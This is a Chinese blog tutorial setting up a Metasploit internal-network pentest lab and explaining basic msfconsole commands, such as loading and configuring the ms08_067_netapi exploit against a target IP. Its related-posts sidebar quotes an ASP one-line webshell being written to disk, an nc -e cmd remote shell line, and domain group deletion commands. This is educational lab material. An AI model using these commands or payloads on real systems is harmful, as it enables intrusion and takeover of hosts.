Metasploit 内网渗透一 ——基础环境配置、渗透过程中遇到的配置问题处理、kali中MSF基础命令

已于 2024-06-27 10:29:12 修改
阅读量890 收藏 6
点赞数 9
文章标签: 网络
于 2024-04-18 23:31:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63701503/article/details/137941826
版权

目录

一、Metasploitable2-linux 基础环境配置

1、修改kali配置文件(手动)

2、需先登普通用户,在进行其他操作

3、修改msf 中 root用户密码(需先登录普通用户)

4、切换到root用户

5、退出超级用户

6、vi编译器使用

6、ifconfig:显示或配置网络设备(网络接口卡)

二、渗透过程遇到的问题处理

内网环境配置

win7无法ping通百度

以及网卡未生效处理

kali无法ping通baidu.com等网络

三、kali中MSF基础使用

(1)connect --远程连接主机

(2)show ---参数如all、exploits(攻击)、payloads(载荷) ---msf中模块命令

(3)search --查找漏洞模块、各种插件

        例 1:通过 name 关键字进行查找

例 2:通过路径进行查找

例 3:缩小查询范围 关键字:platform 平台

例 4:通过类型进行查找 type:命令。

例 5:联合查找

例 6:根据 CVE 搜索 exploit 相关模块

(4)use ---模块命令,选中模块

1):先找出想要模块

2):装载一个渗透攻击模块

(5)info --模块命令,显示模块相关信息

方法1:info 模块信息

方法 2:use 装载模块后直接使用 info

1)、可用目标,就是查看可以攻击哪些操作系统

2)、Basic options: 调用漏洞需要的相关参数

(3)、漏洞描述和执行过程:

(4)、参考文档

方法 3:使用 show 命令查看模块的相关信息

(6)back ---退出相应模块

此内网渗透测试的ip配置:

        Metasploitable2-linux:攻击机 192.168.234.8

        kali-debian:攻击机 192.168.234.141

        win7 虚拟机:靶机 192.168.234.158

一、Metasploitable2-linux 基础环境配置

1、修改kali配置文件(手动)

  • vim /etc/network/interfaces
  • #动态ip为dhcp        ——我们再这里设为静态,以免后续需要经常查看ip值

        dhcp:动态ip(网络协议) static:静态ip

        address:地址

        netmask:子网掩码

        gateway:网关

2、需先登普通用户,在进行其他操作

        kali切换到root用户,再在命令行输入:msfconsole        ——进入msf登录命令行

        普通用户默认账号:msfadmin

        默认密码:msfadmin

3、修改msf 中 root用户密码(需先登录普通用户)

  • sudo passwd root
  • [sudo] password for msfadmin:普通用户密码(即旧密码:msfadmin)
  • Enter new UNIX password:新密码(自行输入)
  • Retype new UNIX password:新密码(再次确认)

4、切换到root用户

  • msfadmin@metasploitable:~$su root
  • Password:新密码

5、退出超级用户

        exit:退出超级用户

6、vi编译器使用

   esc + : + { ①q         ②q!         ③wq!}

   进入vi后点i,出现Insert即可编写  

   退出:

  1.              先输入 esc:  ,再换行;
  2.              再输入以下其中之一,之后换行,即可执行

                                wq(保存退出)

                                q!(强制退出)

                                wq!(强行保存vi文件,如已经有,则进行覆盖)

                                q(只读了文件并没有修改)

                                W filename (相当于另存为,将第n-m行文本保存到指定的文件)

6、ifconfig:显示或配置网络设备(网络接口卡)

            • eth0:网络接口
            • link encap:网络类型
            • HWaddr:网卡物理地址
            • Inet addr :IP地址
            • Bcast:广播地址
            • Mask:子网掩码
            • UP:正在使用的网络接口
            • RX packets,TX packets接收和传输的数据包个数
            • RX byte,TX byte表示接搜和传输的具体数目
            • Interrupt:中断号信息
            • Base address:内存地址

二、渗透过程遇到的问题处理

        以下都是我在学习进行内网渗透式所遇到的部分配置问题

内网环境配置

        Metasploitable2-linux:攻击机 192.168.234.8

        kali-debian:攻击机 192.168.234.141

        win7 虚拟机:靶机 192.168.234.158

同时还需要配置虚拟机网络

win7无法ping通百度

win7靶机需要关闭防火墙,kali才能ping通

如果还是无法ping通,尝试将win7设置常用DNS

以及网卡未生效处理

修改网卡后,需要重启网卡:service networking restart

win7没有网络,需重启:win7无法连接网络怎么办 win7无法连接网络解决方法【详解】-太平洋电脑网

kali无法ping通baidu.com等网络

三、kali中MSF基础使用

Metasploit 基本使用方法 -----msf

        Kali:

                msf命令分为: 用help查看

                Core Commands #核心命令(eg、connect)

                Module Commands #模块命令(eg、show、search)

                Job Commands #后台任务命令

                Resource Script Commands #资源脚本命令

                Database Backend Commands #数据库后端命令

                Credentials Backend Commands #证书/凭证后端命令

                Developer Commands #开发人员命令

(1)connect --远程连接主机

        connect命令主要用于远程连接主机,一般用于内网渗透,比较常用的命令就是“connect 192.168.1.1 80” -------msf中核心命令

192.168.1.1:IP地址 80:端口号

(2)show ---参数如all、exploits(攻击)、payloads(载荷) ---msf中模块命令

例 1:列出 metasploit 框架中的所有渗透攻击模块 exploits。

msf5 > show exploits

#列出 metasploit 框架中的所有渗透攻击模块。该命令列出数据较多,较为耗费时间。

msf5 > show payloads

#列出 metasploit 框架中的所有攻击载荷。

msf5 > show auxiliary

#列出 metasploit 框架中的所有辅助攻击载荷。

互动:使用 show 命令,执行很慢,怎么办?

(3)search --查找漏洞模块、各种插件

例 1:通过 name 关键字进行查找

    例:先查找出自己想要的 ms08_067 漏洞模块。

        msf5 > search ms08_067

        语法:Search Keywords 参数:关键字

        比如 msf5 > search name:mysql #要查找 mysql 数据库的漏洞

例 2:通过路径进行查找

        有时候,我们只记得模块的路径,但是却忘记了模块的名称。那么就可以用 path:命令查找在该路径下的所有模块。如果我要 mysql 路径下的所有 mysql 利用模块,那么就输入:

msf5 > search path:mysql

例 3:缩小查询范围 关键字:platform 平台

        作用: Modules affecting this platform 即:列出可以影响此平台的模块,也就是比较好的漏洞有时候我们会搜索到大量的模块,那么可以用 platform:命令来缩小查询范围。使用 platform 命令后,所查询的结果会列出 rank 比较高的模块。

        msf5 > search platform:mysql ---查找 mysql 的漏洞

        注:对比上面的截图,所有 rank 为 normal 的模块全部都屏蔽了,只剩下几个比较高级的利用模块。

例 4:通过类型进行查找 type:命令。

        type : 特定类型的模块(exploit, payload, auxiliary, encoder, evasion, post, or nop)

        msf5 > search type:exploit --搜索 exploit 模块

例 5:联合查找

        msf5 > search name:mysql type:exploit ---查找 mysql 的 exploit 相关漏洞

        注:MySQL yaSSL CertDecoder::GetName Buffer Overflow 的意思是:mysql yassl certdecoder::getname 缓冲区溢出漏洞

例 6:根据 CVE 搜索 exploit 相关模块

        msf5 > search cve:CVE-2017-8464 type:exploit --查找:CVE-2017-8464 远程命令执行漏洞

        msf5 > search cve:2018 name:linux ---查找 2018 年 linux 相关的漏洞模块

(4)use ---模块命令,选中模块

        use 模块名字

1):先找出想要模块

以下3中搜索方式,找出结果一样,metasploit支持模糊查找,不区分大小写:

                msf5 > search ms08_067 #使用下划线

                msf5 > search ms08-067 #使用减号

                msf5 > search MS08-067 #使用大写字母 MS

2):装载一个渗透攻击模块

msf5 > use exploit/windows/smb/ms08_067_netapi

msf5 exploit(windows/smb/ms08_067_netapi) > back #back 退出当前调用的模块

(5)info --模块命令,显示模块相关信息

方法1:info 模块信息

        msf5 > info exploit/windows/smb/ms08_067_netapi

方法 2:use 装载模块后直接使用 info

        msf5 > use exploit/windows/smb/ms08_067_netapi

                    info

1)、可用目标,就是查看可以攻击哪些操作系统

2)、Basic options: 调用漏洞需要的相关参数

(3)、漏洞描述和执行过程:

(4)、参考文档

方法 3:使用 show 命令查看模块的相关信息

msf5 exploit(windows/smb/ms08_067_netapi) > show options #查看模块的选项

msf5 exploit(windows/smb/ms08_067_netapi) > show targets #查看可以攻击哪些操作系

设置 RHOSTS 参数,指定攻击的目标机器

        msf5 exploit(windows/smb/ms08_067_netapi) > set RHOST 192.168.1.54

        msf5 exploit(windows/smb/ms08_067_netapi) > show options #查看设置的值

配置好了之后我们输入 exploit 或 run 就可以执行该模块。

        msf6 exploit(windows/smb/ms08_067_netapi) > back #使用 back 即可退出装载的模块

注:不要使用 exit,exit 会直接退出 Metasploit 程序

(6)back ---退出相应模块

        本期是基础的内网渗透测试环境配置问题、基础命令等,下一期内容就会详细讲解实战内网渗透测试操作和原理,将附带相关工具和环境文件。

久久归依
关注
内网渗透命令
课嗨教育的专栏
05-04 385
1.域常用操作命令: net group /domain //获得所有域用户组列表 net group qq_group /domain //显示域qq_group组的成员 net group qq_group /del /domain //删除域qq_group组 net group qq_group qq /del /domain //删除域内qq_group 群组的成员QQ net gro.
内网渗透常见命令收集整理
j448998943的博客
01-07 514
1,执行如下命令,可以获取当前机器是否处在内网、有几个内网、内网段分别是多少、是否是域内网、网关 IP 地址、DNS 指向的 IP 地址等信息 ipconfig /all 2,获取系统和版本信息 systeminfo | findstr /B /I /C:“os name” /C: “OS Version” 3,/B: 在一行开始匹配,/I:不区分大小写 /C:string :使用指定的字符串作为文字搜索字符串 如果是文操作系统,输入如下命令 systeminfo | findstr /B
linux系统安装msf过程详解
09-14
主要介绍了linux系统安装msf过程,本文给大家介绍的非常详细,对大家的学习或工作具有一定的参考借鉴价值,需要的朋友可以参考下
内网渗透——Metasploit的代理转发
m0_65544268的博客
07-10 826
计算机配置==》管理模块==》网络==》Lanman工作站==》启用不安全的来宾登录。7)使用proxychains4测试访问主机2上的IIS。win10/11有可能没有打开服务,导致无法访问共享。lhost: 0.0.0.0 指定主机2本机地址。3)被攻击主机1运行生成的1111.exe文件。这样我们就实现了第一个主机上线的过程了。2)在已经上线的主机1上创建代理转发功能。出现这样的页面就说明添加路由成功了。这样我们就实现了三台主机上线了。10)主机2运行2222.exe。
揭秘内网渗透命令大全助你轻松测试安全【内网渗透命令大全】
最新发布
qq_44005305的博客
10-12 1118
网络安全最新课程大纲感兴趣可留言![在这里插入图片描述](https://img-
内网渗透一些命令收集整理
cnbird's blog
05-12 7239
内网渗透一些命令收集整理
内网渗透常用命令
harry1984的专栏
01-04 679
<br />       对入侵者来说,获取Windows的口令是整个攻击过程至关重要的一环,拥有系统原来用户的口令,将使得内网渗透和守控更加容易。Windows系统的Hash密码值主要有LM-HASH以及NTLM-HASH值两部分构成,一旦入侵者获取了系统的Hash值,通过LC5以及彩虹表等破解工具可以很快的获取系统的密码。为此安天365团队(www.antian365.com)特别针对系统口令攻击与防范展开专题进行研究,本文主要作为其的一个子课题,探讨如何使用Gethashes工具来获取系统的Has
内网渗透之常见命令
crystal0011的专栏
06-15 981
转自:freebuf.com   新菜一名,请勿拍砖. 上次发了一篇文章—【再探内网(域)渗透】,讨论的人不少,比较开心.但是,总有一种感觉,那就是大家话到嘴边就停住了,让人很心急. 希望在此能够通过我的破文,引起渗透爱好者的讨论.了解域渗透的兄弟姐妹,请不要吝啬自己的技术,真心希望大家能分享一下自己渗透的点点滴滴.请指点一下那些一直在努力的花朵们. 如果可能,希望大家续贴发
安全笔记:渗透|MetasploitMSF终端——基础使用(未完全修改)
吾本一无所有,何患徒壁之忧.
05-19 1275
目录 基础 使用指南 接口 功能程序 基础功能 载荷配置 攻击方式 msfvenom 附属功能 数据库 nexpose nessus 自建脚本 常用模块介绍 情报搜集——扫描模块 渗透攻击 后渗透攻击(Meterpreter) 免杀技术 相关知识 基础 使用指南 情报搜集:通常使用信息探测等方式获取目标主机的信息,信息探测分为主动信息探测和被动信息探测,...
渗透工具之Kali MSFmetasploit framework)使用
赤赤三的博客
03-20 4860
初识MSF渗透测试开源软件平台,一个漏洞利用框架,对计算机软件漏洞进行攻击) Kali查找MSF框架:cd /usr/share/metasploit-framework,进入windows攻击模块:cd /usr/share/metasploit-framework/modules/exploits/windows 学习路线:MSF了解------>安装MSF2-Linux靶机------->MSF基本使用方法------>MSF实战:攻击win7主机并远程执行命令|扫描靶机my
信息系统安全——基于 KALIMetasploit渗透测试
cc123489ll的博客
04-26 949
实验 2 基于 KALIMetasploit渗透测试2.1 实验名称《基于 KALIMetasploit渗透测试》2.2 实验目的1 、熟悉渗透测试方法2 、熟悉渗透测试工具 KaliMetasploit 的使用2.3 实验步骤及内容**** 、安装系统**** 、选择**** 种攻击工具,记录攻击的主要步骤和攻击结果截图。攻击一:使用复现“永恒之蓝”漏洞实验环境:Win7(关闭防火墙,开启 SMB 服务);1 启动 Metasploit
Metasploitable:白帽駭客新兵訓練營,完整扫描版
11-29
【人生若骐,达者不败】 透過實戰精進功力,強化資安觀念與攻防技巧 Metasploitable2是一個以Linux為基礎的虛擬機器映像檔,可用來進行作業平臺、資料庫及網頁的漏洞滲透練習。本書將帶您利用Kali2虛擬機(滲透工作站)對Metasploitable2虛擬環境(靶機)進行駭客入侵實戰,幫助您從實作過程,了解駭客如何利用系統漏洞發動攻擊,藉此加強滲透測試的功力,從而建立更加安全的環境。 本書可以幫助您: .透過實例練習了解駭客如何入侵 .藉由實作結果驗證理論 .認識駭客攻擊系統的手法 .了解如何撰寫滲透測試報告書
详尽的msf——meterpreter——渗透测试教程
热门推荐
qq_42882717的博客
03-21 2万+
详尽的msf——meterpreter——渗透测试教程,如何使用,如何前后期做渗透测试
内网渗透常用命令大全适合初学者
xiaolaodi666的博客
04-06 5697
内网信息收集常用系统命令,无需工具。
metasploitable
blrk
06-06 1296
Metasploit推出了Metasploitable这个操作系统,是以Vmware 6.5的镜像形式发布的,其实就是Ubuntu 8.04 + 各种数据库+各种网络服务,当然都没有打补丁,因而整个系统漏洞随处可见,弱口令,溢出......使用MSF工具时,Metasploitable是一个不错的练手的系统。但可惜在MSF的主站仅提供了torrent的下载,对于教育网的我来说,速度很低,还需要开国
Metasploitable
梦落红尘
11-03 1497
One of the problems you encounter when learning how to use an exploitation framework is trying to configure targets to scan and attack. Luckily, the Metasploit team is aware of this and released a vul
Metasploit 魔鬼训练营》02 渗透测试实验环境
kevinhanser
08-23 4155
1. 系统环境(Vmware Workstation) 2 . 渗透测试实验环境的搭建
windows下面常用的***测试命令
weixin_34354173的博客
08-21 363
echo ^<%eval request(“#”)%^> >C:\wmpub\hkfe666\h4ck.asp Md hack 创建hack文件夹 本地nc -vv -p -l 端口服务器nc路径 -e cmd路径 ip 端口 Rd hack 删除hack文件夹 Type d:\wwwroot\hack.asp 查看一句话*...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值